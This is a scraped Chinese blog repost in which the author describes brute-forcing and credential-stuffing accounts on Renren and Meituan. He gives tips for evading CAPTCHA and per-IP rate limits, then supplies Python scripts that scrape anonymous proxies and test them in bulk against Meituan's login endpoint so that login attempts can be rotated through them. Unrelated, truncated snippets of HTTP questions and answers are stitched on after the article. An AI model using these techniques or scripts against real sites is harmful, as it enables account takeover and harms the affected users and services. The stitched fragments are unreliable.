- ubuntu12.04环境下使用kvm ioctl接口实现最简单的虚拟机
- Ubuntu 通过无线网络安装Ubuntu Server启动系统后连接无线网络的方法
- 在Ubuntu上搭建网桥的方法
- ubuntu 虚拟机上网方式及相关配置详解
CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.
这篇CFSDN的博客文章批量获取及验证HTTP代理的Python脚本由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.
HTTP暴力破解、撞库,有一些惯用的技巧,比如:
1. 在扫号人人网时,我遇到单个账号错误两次,强制要求输入验证码,而对方并未实施IP策略.
我采用维护10万(用户名,密码) 队列的方式来绕过验证码。具体的做法是,当某个用户名、密码组合遇到需要验证码,就把该破解序列挂起,放到队列尾部等待下次测试,继续破解其他账号密码.
这样就可以保证2/3的时间都在进行正常破解和扫号.
2. 在破解美团网某系统账号时,我遇到了单个IP访问有一定限制,请求频率不可过快。于是我挂了72个 HTTP代理来解决这个问题。 看似每个IP的请求都正常,但其实从整个程序上看,效率还是挺可观的.
本篇我发出自己抓HTTP的脚本片段,其实只有几行。匿名代理是从这里抓取的:http://www.xici.net.co/nn/ 。
首先获取代理列表 :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
from
bs4
import
BeautifulSoup
import
urllib2
of
=
open
(
'proxy.txt'
,
'w'
)
for
page
in
range
(
1
,
160
):
html_doc
=
urllib2.urlopen(
'http://www.xici.net.co/nn/'
+
str
(page) ).read()
soup
=
BeautifulSoup(html_doc)
trs
=
soup.find(
'table'
,
id
=
'ip_list'
).find_all(
'tr'
)
for
tr
in
trs[
1
:]:
tds
=
tr.find_all(
'td'
)
ip
=
tds[
1
].text.strip()
port
=
tds[
2
].text.strip()
protocol
=
tds[
5
].text.strip()
if
protocol
=
=
'HTTP'
or
protocol
=
=
'HTTPS'
:
of.write(
'%s=%s:%s\n'
%
(protocol, ip, port) )
print
'%s=%s:%s'
%
(protocol, ip, port)
of.close()
|
接着验证代理是否可用,因为我是用于破解美团网系统的账号,因此用了美团的页面标记:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
#encoding=gbk
import
httplib
import
time
import
urllib
import
threading
inFile
=
open
(
'proxy.txt'
,
'r'
)
outFile
=
open
(
'available.txt'
,
'w'
)
lock
=
threading.Lock()
def
test():
while
True
:
lock.acquire()
line
=
inFile.readline().strip()
lock.release()
if
len
(line)
=
=
0
:
break
protocol, proxy
=
line.split(
'='
)
headers
=
{
'Content-Type'
:
'application/x-www-form-urlencoded'
,
'Cookie'
: ''}
try
:
conn
=
httplib.HTTPConnection(proxy, timeout
=
3.0
)
conn.request(method
=
'POST'
, url
=
'http://e.meituan.com/m/account/login'
, body
=
'login=ttttttttttttttttttttttttttttttttttttt&password=bb&remember_username=1&auto_login=1'
, headers
=
headers )
res
=
conn.getresponse()
ret_headers
=
str
( res.getheaders() )
html_doc
=
res.read().decode(
'utf-8'
)
print
html_doc.encode(
'gbk'
)
if
ret_headers.find(u
'/m/account/login/'
) >
0
:
lock.acquire()
print
'add proxy'
, proxy
outFile.write(proxy
+
'\n'
)
lock.release()
else
:
print
'.'
,
except
Exception, e:
print
e
all_thread
=
[]
for
i
in
range
(
50
):
t
=
threading.Thread(target
=
test)
all_thread.append(t)
t.start()
for
t
in
all_thread:
t.join()
inFile.close()
outFile.close()
|
。
最后此篇关于批量获取及验证HTTP代理的Python脚本的文章就讲到这里了,如果你想了解更多关于批量获取及验证HTTP代理的Python脚本的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
据我了解,HTTP POST 请求的正文大小没有限制。因此,客户端可能会在一个 HTTP 请求中发送 千兆字节 的数据。现在我想知道 HTTP 服务器应该如何处理此类请求。 Tomcat 和 Jett
在了解Web Deploy我遇到了一些讨论 http://+:80 和 http://*:80 的 netsh.exe 命令。这些是什么意思? 最佳答案 引自URLPrefix Strings (Wi
假设我有一个负载均衡器,然后是 2 个 Web 服务器,然后是一个负载均衡器,然后是 4 个应用程序服务器。 HTTP 响应是否遵循与 HTTP 请求服务相同的路径? 最佳答案 按路径,我假设您是网络
我有一个带有 uri /api/books/122 的资源,如果在客户端为此资源发送 HTTP Delete 时该资源不存在,那么相应的响应代码是什么这个 Action ?是不是404 Not Fou
是否有特定的(或约定的)HTTP 响应消息(或除断开连接之外的其他操作)来阐明服务器不接受 pipelined HTTP requests ? 我正在寻找能让客户端停止流水线化它的请求并分别发送每个请
在了解Web Deploy我遇到了一些讨论 http://+:80 和 http://*:80 的 netsh.exe 命令。这些是什么意思? 最佳答案 引自URLPrefix Strings (Wi
我有一个带有 uri /api/books/122 的资源,如果在客户端为此资源发送 HTTP Delete 时该资源不存在,那么相应的响应代码是什么这个 Action ?是不是404 Not Fou
关闭。这个问题需要更多focused .它目前不接受答案。 想改进这个问题吗? 更新问题,使其只关注一个问题 editing this post . 关闭 8 年前。 Improve this qu
我使用 Mule 作为 REST API AMQP。我必须发送自定义请求方法:“PRINT”,但我收到: Status Code: 400 Bad Request The request could
我需要针对具有不同 HTTP 响应代码的 URL 测试我的脚本。我如何获取响应代码 300、303 或 307 等的示例/示例现有 URL? 谢谢! 最佳答案 您可以使用 httpbin为此目的。 例
我正在尝试编写一个程序来匹配 HTTP 请求及其相应的响应。似乎在大多数情况下一切都运行良好(当传输完全有序时,即使不是,通过使用 TCP 序列号)。 我发现的唯一问题是当我有流水线请求时。在那之后,
RESTful Web Services鼓励使用 HTTP 303将客户端重定向到资源的规范表示。它仅在 HTTP GET 的上下文中讨论主题。 这是否也适用于其他 HTTP 方法?如果客户端尝试对非
当使用chunked HTTP传输编码时,为什么服务器需要同时写出chunk的字节大小并且后续的chunk数据以CRLF结尾? 这不会使发送二进制数据“CRLF-unclean”和方法有点多余吗? 如
这个问题在这里已经有了答案: Is it acceptable for a server to send a HTTP response before the entire request has
如果我向同一台服务器发出多个 HTTP Get 请求并收到每个请求的 HTTP 200 OK 响应,我如何使用 Wireshark 判断哪个请求映射到哪个响应? 目前看起来像是发出了一个 http 请
func main() { http.HandleFunc("/", handler) } func handler(w http.ResponseWriter, r http.Request
我找不到有值(value)的 NodeJS with Typescript 教程,所以我在无指导下潜入水中,果然我有一个问题。 我不明白这两行之间的区别: import * as http from
问一个关于Are HTTP headers case-sensitive?的问题,如果 HTTP 方法区分大小写,大多数服务器如何处理“get”或“post”与“GET”或“POST”? 例如,看起来
我正在使用ASP.NET,在其中我通过动词GET接收查询,该应用程序专用于该URL。 该代码有效,但是如果用户发送的密码使http 200无效,请回答我,并在消息的正文中显示“Fail user or
Closed. This question needs details or clarity。它当前不接受答案。 想改善这个问题吗?添加详细信息,并通过editing this post阐明问题。 9
我是一名优秀的程序员,十分优秀!